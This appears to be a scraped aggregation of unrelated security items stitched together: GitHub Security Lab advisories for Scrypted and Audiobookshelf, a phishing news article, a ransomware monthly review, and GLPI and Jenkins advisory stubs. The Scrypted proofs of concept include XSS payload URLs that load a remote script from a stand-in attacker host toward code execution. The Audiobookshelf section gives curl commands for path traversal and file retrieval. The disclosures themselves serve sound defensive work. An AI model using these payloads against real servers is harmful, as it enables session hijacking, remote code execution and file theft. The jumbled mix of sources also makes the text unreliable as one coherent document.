Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available.

**Coordinated Disclosure Timeline**

*   2023-10-6: Report Submitted
*   2023-10-13: Advisory Published

**Summary**

Two refelcted Cross-Site Scripting (XSS) vulnerabilities exist in scrypted that may allow an attacker to impersonate any user who clicks on specially crafted links. In the worst case, an attacker may be able to impersonate an administrator and run arbitrary commands.

**Project**

scrypted

**Tested Version**

v55.0

**Details****Issue 1: reflected XSS in plugin-http.ts (GHSL-2023-218)**

The owner and pkg parameters are reflected back in the response when the endpoint is not found, allowing for a reflected XSS vulnerability.

    const { owner, pkg } = req.params;
            let endpoint = pkg;
            if (owner)
                endpoint = `@${owner}/${endpoint}`;
            const pluginData = await this.getEndpointPluginData(req, endpoint, isUpgrade, isEngineIOEndpoint);
    
            if (!pluginData) {
                end(404, `Not Found (plugin or device "${endpoint}" not found)`);
                return;
            }
    
    
    

**Impact**

This issue may lead to Remote Code Execution.

**Resources**

Proof of Concept:

The following url will create a script tag in the current document which will load attacker.domain/rce.js. This JavaScript file can then be used to communicate with the server over HTTP via RPC, and send some requests to get the nativeId and proxyID for the automation:update-plugins and achieve the ability to run shell commands at a specified time.

https://localhost:10443/endpoint/%3Cimg%20src%20onerror=a=document.createElement(‘script’);a.setAttribute(‘src’,document.location.hash.substr(1));document.head.appendChild(a)%3E/pkg#//attacker.domain/rce.js

In the browser, you should see the script element be created with the src as https://attacker.domain/rce.js.

**Issue 2: reflected XSS in plugins/core/ui/src/Login.vue (GHSL-2023-219)**

A reflected XSS vulnerability exists in the login page via the redirect_uri parameter. By specifying a url with the javascript scheme (javascript:), an attacker can run arbitrary JavaScript code after the login.

      try {
              const redirect_uri = new URL(window.location).searchParams.get('redirect_uri');
              if (redirect_uri) {
                window.location = redirect_uri;
                return;
              }
    
            }
    

**Impact**

This issue may lead to Remote Code Execution.

**Resources**

Proof of Concept:

When the user is not logged in, send a link to the server with the parameter:

redirect_uri=javascript:var script = document.createElement('script');script.src = 'https://attacker.domain'; document.head.appendChild(script);

at the end of the uri (but before the #).

Example: https://localhost:10443/endpoint/test/test?redirect_uri=javascript:var%20script%20=%20document.createElement('script');script.src%20=%20'https://attacker.domain';%20document.head.appendChild(script);#//

Similar to Proof of Concept 1 this will load a JavaScript file which can make authenticated requests to the server, possibly leading to RCE.

**Credit**

These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings). This vulnerability was found with the help of CodeQL Reflected XSS query.

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-218 or GHSL-2023-219 in any communication regarding these issues.

CVE-2023-47623: GHSL-2023-218_GHSL-2023-219: Cross-Site Scripting (XSS) in scrypted

A stored, DOM based, cross-site scripting (XSS) flaw was found in Prometheus before version 2.7.1. An attacker could exploit this by convincing an authenticated user to visit a crafted URL on a Prometheus server, allowing for the execution and persistent storage of arbitrary scripts.

**Prometheus XSS Vulnerability**

Moderate severity GitHub Reviewed Published Dec 13, 2023 to the GitHub Advisory Database • Updated Dec 13, 2023

GHSA-3m87-5598-2v4f: Prometheus XSS Vulnerability

Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response. This issue may lead to Information Disclosure. As of time of publication, no patches are available.

**Coordinated Disclosure Timeline**

*   2023-10-01: Report submitted to maintainer
*   2023-11-01: Advisory Published

**Summary**

Audiobookshelf is vulnerable to server-side request forgery (SSRF), arbitrary file read (AFR) and arbitrary file deletion (AFD) depending on the permissions of the user.

**Project**

audiobookshelf

**Tested Version**

v2.4.3

**Details**

Users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response.

       const payload = req.body // <---- imagePath comes from req.body without sanitization
        if (payload.imagePath !== undefined && payload.imagePath !== req.author.imagePath) {
          if (!payload.imagePath && req.author.imagePath) {
            await CacheManager.purgeImageCache(req.author.id)
            await CoverManager.removeFile(req.author.imagePath) // <---- imagePath is passed to removeFile
          } else if (payload.imagePath.startsWith('http')) {
            const imageData = await AuthorFinder.saveAuthorImage(req.author.id, payload.imagePath) // <---- imagePath is used to make a GET request and its response is saved
            if (imageData) {
              if (req.author.imagePath) {
                await CacheManager.purgeImageCache(req.author.id)
              }
              payload.imagePath = imageData.path
              hasUpdated = true
            }
          } else if (payload.imagePath && payload.imagePath !== req.author.imagePath) {
            if (!await fs.pathExists(payload.imagePath)) {            // < ---- only check for existence of path, thus specifying any local file will result in file read
              Logger.error(`[AuthorController] Image path does not exist: "${payload.imagePath}"`)
              return res.status(400).send('Author image path does not exist')
            }
    
            if (req.author.imagePath) {
              await CacheManager.purgeImageCache(req.author.id)
            }
          }
        }
    

**Impact**

This issue may lead to Information Disclosure.

**Resources**

**SSRF**

1.  In order to exploit SSRF, first send a request with the url of the file you wish to download. Curl is messy, so I would just go into the UI and click to edit the author’s image and put in the desired url which will send a PATCH request to /api/authors/author-id.
2.  Download the file from api/authors/author-id/image with the following command:

curl -i -s -k -X $'GET' \
    -H $'Host: localhost:3333' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NmFjZTUxNy01NGJmLTRjYmUtYTBlZC05ZWZkMzZhNWI5NmMiLCJ1c2VybmFtZSI6InRlc3RlciIsImlhdCI6MTY5NTg0ODQ4Mn0.rvF1kTKXHMsjPYV_PtvMnCKNgvXxNrTDTiOIh8yz0hE' -H $'Content-Length: 2' \
    --data-binary $'\x0d\x0a' \
    $'http://localhost:3333/api/authors/40913999-5739-4c84-bff0-93f9b34a08ef/image?token=JWT_TOKEN&raw=true'

**Arbitrary File Deletion**

1.  In order to exploit arbitrary file deletion, first send a request with the path to the file you wish to delete. Curl is messy, so I would just go into the UI and click to edit the author’s image and put in the path to the file you wish to delete which will send a PATCH request to /api/authors/author-id.
2.  Then, go into the UI and click to edit the author’s image and put in nothing which will send a PATCH request to /api/authors/author-id with an empty imagePath, deleting the file.

**Issue 2: Arbitrary File Read in HlsRouter.js (GHSL-2023-204)**

Any user (regardless of their permissions) may be able to read files from the local file system due to a path traversal in the /hls endpoint.

     var streamId = req.params.stream
     var fullFilePath = Path.join(this.playbackSessionManager.StreamsPath, streamId, req.params.file)
     var exists = await fs.pathExists(fullFilePath)
     res.sendFile(fullFilePath)
    

**Impact**

This issue may lead to Information Disclosure.

**Resources**

Proof of Concept:

    curl -i -s -k -X $'GET' \
        -H $'Host: localhost:3333' -H $'Accept: application/json, text/plain, */*' -H $'Authorization: Bearer JWT TOKEN' -H $'Content-Length: 2' \
        --data-binary $'\x0d\x0a' \
        $'http://localhost:3333/hls/whatever/..%2F..%2F..%2F..%2F..%2F..%2F(url encoded full path here)'
    

Note: The %2Fs are URL-encoded forward slashes (/) to prevent confusion with the express regex parser. After traversing back enough directories, we can input the URL-encoded full path of the file we wish to access.

**Credit**

These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings). These issues were discovered with the help of CodeQL’s SSRF and Path Injection queries.

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-203 or GHSL-2023-204 in any communication regarding these issues.

CVE-2023-47619: GHSL-2023-203_GHSL-2023-204: Several vulnerabilities in audiobookshelf

By Waqas
BazarCall Evolves: Unraveling the Complexities of Google Forms in the Latest Phishing Tactics!
This is a post from HackRead.com Read the original post: Scammers Weaponize Google Forms in New BazarCall Attack

Google Forms is the latest Google product to be abused by threat actors, this time for a new variant of the BazarCall attack

Cybersecurity researchers at Abnormal Security have identified a new attack campaign in which scammers use the **BazarCall technique (BazaCall or Callback phishing)** to target victims. This time, however, the notorious phishing attack method has taken a sophisticated turn by incorporating Google Forms to enhance its deceptive strategies.

Here, it is worth noting that Abnormal Security’s findings came just a couple of weeks after the **FBI warned users** of the Silent Ransom Group (SRG), also identified as Luna Moth, employing Callback phishing techniques for network hacks.

In the usual scenario, the BazarCall attack typically begins with a phishing email masquerading as a payment notification or subscription confirmation from familiar brands. The email prompts recipients to call a provided phone number to dispute charges or cancel a service, creating a sense of urgency. However, the real objective is to **trick victims into installing malware** during the phone call, exposing organizations to future cyber threats.

What sets this BazarCall variant apart is its utilization of Google Forms to elevate the authenticity of malicious emails. The attacker crafts a Google Form, adding details about a fake transaction, including an invoice number and payment information. The response receipt option is then activated, sending a copy of the completed form to the target’s email address.

In a **blog post**, Mike Britton Chief Information Security Officer at Abnormal Security that the attacker manipulates the process further by sending the form invitation to themselves, completing it with the target’s email address, and making it look like a payment confirmation for a product or service. Using Google Forms, sent from a legitimate Google address, enhances the attack’s legitimacy, making it harder to detect.

> _“Because the email is sent directly from Google Forms, the sender address is forms-receipts-noreply@googlecom, and the sender display name is “Google Forms.” Not only does this contribute to the appearance of legitimacy, it increases the chances of the message being successfully delivered as the email is from a legitimate and trusted domain.”_
> 
> Mike Britton – Abnormal Security

The uniqueness of this BazarCall lies in its difficulty to be identified by traditional email security tools. Unlike typical threats with malicious links or attachments, this attack relies on Google Forms, a trusted service for surveys and quizzes.

Actual email sent by threat actors using Google Forms (Image credit: Abnormal Security)

The dynamic nature of Google Forms URLs further complicates detection, as they frequently change, evading static analysis and signature-based detection used by many security tools. Mike further noted that legacy email security tools, such as secure email gateways (SEGs), struggle to discern the malicious intent behind these emails, leading to potential threats slipping through the cracks.

However, modern **AI-native email security solutions** equipped with behavioural AI and content analysis can accurately identify and thwart such attacks by recognizing brand impersonation and phishing attempts.

In navigating the evolving landscape of cyber threats, staying informed about sophisticated attack methods like this BazarCall variant is crucial. Adopting advanced email security solutions that leverage artificial intelligence is paramount to effectively protect organizations and individuals from the ever-changing tactics of cybercriminals.

****_RELATED ARTICLES_****

1.  **New BEC 3.0 Attack Exploiting Dropbox for Phishing**
2.  **Phishers Exploiting Google Docs to Harvest Crypto Credentials**
3.  **Iran’s MuddyWater Group Targets Israelis with Fake Memo Phishing**
4.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**
5.  **Hotel booking phishing scam uses PDF links to spread MrAnon Stealer**

Scammers Weaponize Google Forms in New BazarCall Attack

In November, ransomware gangs attacked at least 457 victims—the highest monthly count in 2023, after May's record numbers.

_This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In November there were 457 total ransomware victims, making it the most active month for ransomware gangs in 2023 so far besides May. The top stories of the month include ALPHV’s shutdown, an increased focus on the healthcare sector, and high-profile attacks on Toyota, Boeing, and more using a Citrix Bleed vulnerability (CVE-2023-4966).

We’ve written about a few ransomware gangs getting shut down this year, including Hive in January and RansomedVC in October, but ALPHV is the latest—and arguably biggest—name to be crossed off of law enforcements’ hit list in 2023. The fate of the gang was sealed in early December, when their data leak sites suddenly became unavailable. Shortly thereafter, researchers at RedSense confirmed that law enforcement was indeed behind the takedown action.

ALPHV’s shutdown represents a huge blow to the ransomware world—and a big win for defenders. With a total of 573 victims since February 2022, it’s no exaggeration to say that ALPHV was second only to LockBit in being organizations’ biggest ransomware threat. The demise of ALPHV can be examined through a few different lenses. For one, it’s a reminder that no ransomware gang—however prolific or well-resourced—is immune to downfall.

The good news in all this is that today’s _who’s who_ can be tomorrow’s _nobody_. The bad news? That same logic works in reverse as well: Today’s nobody can be tomorrows who’s who.

This is the case we’ve seen with gangs like Medusa or 8BASE. For every head lopped of off the ransomware Hydra, it feels like three more grow in its place. However, none of this is to say that decisive law enforcement action doesn’t deter ransomware gangs to some extent—it does. One can hope that ransomware gangs see a Goliath like ALPHV get felled and think twice about wantonly attacking organizations at the rate we’ve been seeing lately.

In other news, attacks on the healthcare sector last month reached an all-time high at 38 total attacks.

The record follows a steady uptick in attacks on the sector we’ve observed over the past year. According to the findings released by the Department of Health and Human Services last month, there has been a 278% increase in ransomware attacks on health sector over the past four years. “The large breaches reported this year have affected over 88 million individuals, a 60% increase from last year,” the agency also said.

Ransomware attacks on healthcare, 03/22 to 011/23

An attack on Ardent Health Services last month stands as a devastating reification of the trend. The attack, which occurred on Thanksgiving Day, left emergency rooms in multiple hospitals across four US states shut down for five days.

What explains the rise and focus on attacks on the healthcare sector? Well, for one thing, there isn’t a clear bias of one gang disproportionately targeting health care—our data shows LockBit is consistently at the top of the list, as they are likely for most sectors. The explanation, then, likely resides in a combination of facts:

1.  Ransomware attacks are up overall for all sectors
2.  Healthcare is easy to attack (Large number of weak points due to use of legacy systems, third-party vendors, etc).
3.  Healthcare might be more likely to pay (Higher desire to protect sensitive patient data).

Pair this up with a Thanksgiving holiday, and a bigger increase in attacks on health care is somewhat expected.

In other news, ransomware gangs rushed to exploit the Citrix Bleed vulnerability last month, taking advantage of a massive attack surface with over 8,300 vulnerable devices. LockBit led the fray by using the vulnerability to breach the likes of the Industrial and Commercial Bank of China (ICBC), DP World, Allen & Overy, and Boeing. Reported to have been in use as a zero-day since late August, Citrix Bleed provides attackers with the capability to bypass multi-factor authentication (MFA) and hijack legitimate user sessions. It is also said to be very easy to exploit.

Known ransomware attacks by gang, November 2023

Known ransomware attacks by country, November 2023

Known ransomware attacks by industry, November 2023

One of the most interesting developments last month were new reports reinforcing claims that Rhysida may be a rebrand of the infamous Vice Society ransomware gang. Not only does Rhysida share many operational and technical patterns with Vice Society—including using NTDSUtil for backups in ‘temp\_l0gs’ and SystemBC for C2 communications—but the distribution of their monthly attacks lines up as well. Vice Society hasn’t been active since June 2023—the same month we witnessed the rise of Rhysida.

Vice Society vs Rhysidia monthly ransomware attacks. Rhysida seems to pick up right where Vice Society dropped off

That being said, a rebrand isn’t confirmed. Perhaps Rhysida is a splinter group. Whatever the explanation, however, it’s almost certain this pattern is no mere coincidence—especially considering the victimology of the two groups is extremely similar (a focus on education and healthcare sectors).

**New Player: MEOW**

First detected in August 2022, Meow ransomware, linked to the Conti v2 variant, reappeared after vanishing in February 2023. The group published nine victims to its leak site in November.

Operating as MeowCorp or MeowCorp2022, it encrypts files with a “.MEOW” extension and sends ransom notes demanding contact via email or Telegram. Using ChaCha20 and RSA-4096 encryption, Meow is related to other malware strains originating from the leaked Conti variant. Its dark web site shows a limited victim list, including the high-profile entity Sloan Kettering Cancer Center.

**Preventing Ransomware with ThreatDown**

ThreatDown detecting LockBit ransomware

ThreatDown automatically quarantining LockBit ransomware

ThreatDown Bundles combinesthe technologies and services that resource constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down ransomware gangs:

*   **ThreatDown Core Bundle**: Next-gen AV and threat surface reduction. A simple yet superior solution integrating award-winning endpoint protection technologies.
*   **ThreatDown Advanced Bundle**: Everything included in core plus Managed Threat Hunting and Ransomware Rollback. Tailored for smaller security teams with limited resources.
*   **ThreatDown Elite Bundle**: Everything in Advanced plus 24/7/365 expert monitoring and response by Malwarebytes MDR analysts. Purpose-built for organizations with small (to non-existent) security teams that lack the resources to address all security alerts.
*   **ThreatDown Ultimate Bundle**: Everything in Elite plus protection from whole categories of malicious websites. Perfect for teams looking for a one-and-done shortcut to cybersecurity done right.

**Try ThreatDown bundles today**

 Ransomware review: December 2023 

GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, the saved search feature can be used to perform a SQL injection. Version 10.0.11 contains a patch for the issue.

Skip to content

Sign in

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

glpi-project / **glpi** Public

*   Notifications
*   Fork 1.2k
*   Star 3.5k
    

*   Code
*   Issues 137
*   Pull requests 62
*   Actions
*   Projects 1
*   Security
*   Insights

Additional navigation options

Moderate

trasher published GHSA-94c3-fw5r-3362

Dec 13, 2023

**Package**

glpi (glpi)

**Affected versions**

\>= 10.0.0

**Patched versions**

10.0.11

**Description**

**Impact**

The saved search feature can be used to perform a SQL injection.

**Patches**

Upgrade to 10.0.11.

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

Moderate

6.5

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

Low

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**CVE ID**

CVE-2023-43813

**Weaknesses**

CWE-89

**Credits**

*    bhopkins0 Reporter

CVE-2023-43813: Authenticated SQL Injection

Jenkins OpenId Connect Authentication Plugin 2.6 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins, allowing attackers to perform phishing attacks.

**Open redirect vulnerability in Jenkins OpenId Connect Authentication Plugin**

Moderate severity GitHub Reviewed Published Dec 13, 2023 to the GitHub Advisory Database • Updated Dec 18, 2023

GHSA-9qv8-7jfq-73j2: Open redirect vulnerability in Jenkins OpenId Connect Authentication Plugin 

A cross-site request forgery (CSRF) vulnerability in Jenkins HTMLResource Plugin 1.02 and earlier allows attackers to delete arbitrary files on the Jenkins controller file system.

**Cross-site request forgery vulnerability in Jenkins HTMLResource Plugin**

High severity GitHub Reviewed Published Dec 13, 2023 to the GitHub Advisory Database • Updated Dec 13, 2023

GHSA-7ccg-jm7j-4f8v: Cross-site request forgery vulnerability in Jenkins HTMLResource Plugin

A missing permission check in Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID.

**Missing permission check in Jenkins Scriptler Plugin**

Moderate severity GitHub Reviewed Published Dec 13, 2023 to the GitHub Advisory Database • Updated Dec 13, 2023

GHSA-4j42-6xfx-h754: Missing permission check in Jenkins Scriptler Plugin

Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier stores PaaSLane authentication tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

**Tokens stored in plain text by PaaSLane Estimate Plugin**

Moderate severity GitHub Reviewed Published Dec 13, 2023 to the GitHub Advisory Database • Updated Dec 13, 2023

Tag

#git